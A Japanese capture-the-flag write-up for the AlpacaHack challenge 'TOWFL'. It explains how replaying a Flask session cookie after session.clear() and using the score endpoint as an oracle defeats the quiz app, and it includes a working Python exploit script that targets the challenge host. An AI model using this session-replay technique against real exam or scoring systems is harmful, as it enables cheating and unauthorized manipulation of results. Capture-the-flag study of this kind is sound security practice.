はじめに
今回はAlpacaHackのアーカイブにあるTOWFLという問題を解いたので
そのwriteupを書きます。
調査
まずはURLに飛んでみるとStart Examボタンがある簡素なページが出てきます。
ここでボタンを押すと、知らない言語で書かれた問題文と4択の選択欄が出てきました。
調べてみると、大門は10個あり、それぞれに問題文と10個の小問がありました。
最後のページにSubmitがあったので押してみると、スコアが表示されました。
その後は最初のページに推移し、試験をもう一回試すにはStart Examボタンを再度押す必要がありました。
ここでソースコードを見てみます。
#!/usr/bin/env python3
import flask
import json
import lorem
import os
import random
import redis
REDIS_HOST = os.getenv("REDIS_HOST", "redis")
REDIS_PORT = int(os.getenv("REDIS_PORT", "6379"))
app = flask.Flask(__name__)
app.secret_key = os.urandom(16)
@app.route("/")
def index():
return flask.render_template("index.html")
@app.route("/api/start", methods=['POST'])
def api_start():
if 'eid' in flask.session:
eid = flask.session['eid']
else:
eid = flask.session['eid'] = os.urandom(32).hex()
# Create new challenge set
db().set(eid, json.dumps([new_challenge() for _ in range(10)]))
return {'status': 'ok'}
@app.route("/api/question/<int:qid>", methods=['GET'])
def api_get_question(qid: int):
if qid <= 0 or qid > 10:
return {'status': 'error', 'reason': 'Invalid parameter.'}
elif 'eid' not in flask.session:
return {'status': 'error', 'reason': 'Exam has not started yet.'}
# Send challenge information without answers
chall = json.loads(db().get(flask.session['eid']))[qid-1]
del chall['answers']
del chall['results']
return {'status': 'ok', 'data': chall}
@app.route("/api/submit", methods=['POST'])
def api_submit():
if 'eid' not in flask.session:
return {'status': 'error', 'reason': 'Exam has not started yet.'}
try:
answers = flask.request.get_json()
except:
return {'status': 'error', 'reason': 'Invalid request.'}
# Get answers
eid = flask.session['eid']
challs = json.loads(db().get(eid))
if not isinstance(answers, list) \
or len(answers) != len(challs):
return {'status': 'error', 'reason': 'Invalid request.'}
# Check answers
for i in range(len(answers)):
if not isinstance(answers[i], list) \
or len(answers[i]) != len(challs[i]['answers']):
return {'status': 'error', 'reason': 'Invalid request.'}
for j in range(len(answers[i])):
challs[i]['results'][j] = answers[i][j] == challs[i]['answers'][j]
# Store information with results
db().set(eid, json.dumps(challs))
return {'status': 'ok'}
@app.route("/api/score", methods=['GET'])
def api_score():
if 'eid' not in flask.session:
return {'status': 'error', 'reason': 'Exam has not started yet.'}
# Calculate score
challs = json.loads(db().get(flask.session['eid']))
score = 0
for chall in challs:
for result in chall['results']:
if result is True:
score += 1
# Is he/she worth giving the flag?
if score == 100:
flag = os.getenv("FLAG")
else:
flag = "Get perfect score for flag"
# Prevent reply attack
flask.session.clear()
return {'status': 'ok', 'data': {'score': score, 'flag': flag}}
def new_challenge():
"""Create new questions for a passage"""
p = '\n'.join([lorem.paragraph() for _ in range(random.randint(5, 15))])
qs, ans, res = [], [], []
for _ in range(10):
q = lorem.sentence().replace(".", "?")
op = [lorem.sentence() for _ in range(4)]
qs.append({'question': q, 'options': op})
ans.append(random.randrange(0, 4))
res.append(False)
return {'passage': p, 'questions': qs, 'answers': ans, 'results': res}
def db():
"""Get connection to DB"""
if getattr(flask.g, '_redis', None) is None:
flask.g._redis = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, db=0)
return flask.g._redis
if __name__ == '__main__':
app.run()
これを見ると以下のことが分かります。
(1)/api/startで試験を開始し、それと同時にセッションを付与しています。
@app.route("/api/start", methods=['POST'])
def api_start():
if 'eid' in flask.session:
eid = flask.session['eid']
else:
eid = flask.session['eid'] = os.urandom(32).hex()
# Create new challenge set
db().set(eid, json.dumps([new_challenge() for _ in range(10)]))
return {'status': 'ok'}
(2)/api/submitで回答を送信します。形式は以下のようになっていました。
[
[null, null, null, null, null, null, null, null, null, null],
[null, null, null, null, null, null, null, null, null, null],
[null, null, null, null, null, null, null, null, null, null],
[null, null, null, null, null, null, null, null, null, null],
[null, null, null, null, null, null, null, null, null, null],
[null, null, null, null, null, null, null, null, null, null],
[null, null, null, null, null, null, null, null, null, null],
[null, null, null, null, null, null, null, null, null, null],
[null, null, null, null, null, null, null, null, null, null],
[null, null, null, null, null, null, null, null, null, null]
]
2次元配列のJSON形式で回答を送信していました。nullの部分には0~3の回答番号が入ります。
(3)/api/submitで回答を受け取ったサーバは問題の答えと照らし合わせ
合っているものにはtrueを、間違っているものにはfalseを先ほどと同様の2次元配列で格納します。
この時その結果はサーバ側にセッションと紐づく形で保管されています。以降は回答結果と呼びます。
@app.route("/api/submit", methods=['POST'])
def api_submit():
if 'eid' not in flask.session:
return {'status': 'error', 'reason': 'Exam has not started yet.'}
try:
answers = flask.request.get_json()
except:
return {'status': 'error', 'reason': 'Invalid request.'}
# Get answers
eid = flask.session['eid']
challs = json.loads(db().get(eid))
if not isinstance(answers, list) \
or len(answers) != len(challs):
return {'status': 'error', 'reason': 'Invalid request.'}
# Check answers
for i in range(len(answers)):
if not isinstance(answers[i], list) \
or len(answers[i]) != len(challs[i]['answers']):
return {'status': 'error', 'reason': 'Invalid request.'}
for j in range(len(answers[i])):
challs[i]['results'][j] = answers[i][j] == challs[i]['answers'][j]
# Store information with results
db().set(eid, json.dumps(challs))
return {'status': 'ok'}
(4)/api/scoreでセッションに紐づいた回答結果を基にtrueが見つかる度に、セッションに紐づくscoreを加算していきます。
最後にscoreが100であればフラグを含み、試験結果をJSON形式で返します。
@app.route("/api/score", methods=['GET'])
def api_score():
if 'eid' not in flask.session:
return {'status': 'error', 'reason': 'Exam has not started yet.'}
# Calculate score
challs = json.loads(db().get(flask.session['eid']))
score = 0
for chall in challs:
for result in chall['results']:
if result is True:
score += 1
# Is he/she worth giving the flag?
if score == 100:
flag = os.getenv("FLAG")
else:
flag = "Get perfect score for flag"
# Prevent reply attack
flask.session.clear()
return {'status': 'ok', 'data': {'score': score, 'flag': flag}}
ここで(4)に気になる点が見つかります。
flask.session.clear関数を用いて、回答送信後にセッションをクリアしています。
ですがこの関数をよく調べると、実際にセッションIDが無効になるわけではないことがわかりました。*1
この関数はブラウザから強制的にセッションIDをクッキーから引き剥がすという動作をするだけです。
よって回答の再送が行えます。
ですが、単純な総当たりでscoreを100にしようとすると、0~3の数字(4) ** 小問の数(10) ** 大門の数(10)で
送信するリクエストの数が膨大になってしまいます。
問題のインスタンスも10分を経過すると削除されてしまうので、他の方法を探さなければなりません。
そこで/api/scoreリクエストを送るとスコアが表示されることを利用します。
1問目から0~3までの全ての回答をした場合のscoreをそれぞれ用意します。
0 -> score=1
1 -> score=0
2 -> score=0
3 -> score=0
スコアが以前のものより大きくなっていれば、それが正解となります。
これを100問目まで繰り返していけばscoreが100になり、フラグがもらえます。
以下にExploitコードを示します。
import string
import json
import requests
import itertools
def post(url, data, headers, cookies):
if data is None:
return requests.post(url, headers=headers, cookies=cookies)
return requests.post(url, headers=headers, json=data, cookies=cookies)
def get(url, headers, cookies):
return requests.get(url, headers=headers, cookies=cookies)
def check_answer(base_url, answers, headers, cookies):
post(base_url + "api/submit", answers, headers, cookies)
score = int(get(base_url + "api/score", headers, cookies).json()["data"]["score"])
return score
def start(base_url):
return requests.post(base_url + "api/start").cookies.get("session")
def main():
base_url = "http://34.170.146.252:24277/"
i = 0
answers = [
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
headers = {
"Content-Type": "application/json"
}
cookies = {
"session": start(base_url)
}
base_line = check_answer(base_url, answers, headers, cookies)
print(get(base_url + "api/score", headers, cookies).text)
while True:
base_line = check_answer(base_url, answers, headers, cookies)
if base_line == 100:
break
temp = answers[:]
print(i)
ans = (temp[int(i / 10)][i % 10] + 1) % 4
temp[int(i / 10)][i % 10] = ans
if base_line < check_answer(base_url, temp, headers, cookies):
answers[int(i / 10)][i % 10] = ans
i += 1
print(get(base_url + "api/score", headers=headers, cookies=cookies).text)
if __name__ == "__main__":
main()
*1: https://scrapbox.io/murasemasaki-43680195/Flask_Session
おわりに
この問題のwriteupはまだAlpacaHackには載っていなかったので
writeupでfirst bloodを取れて嬉しいです。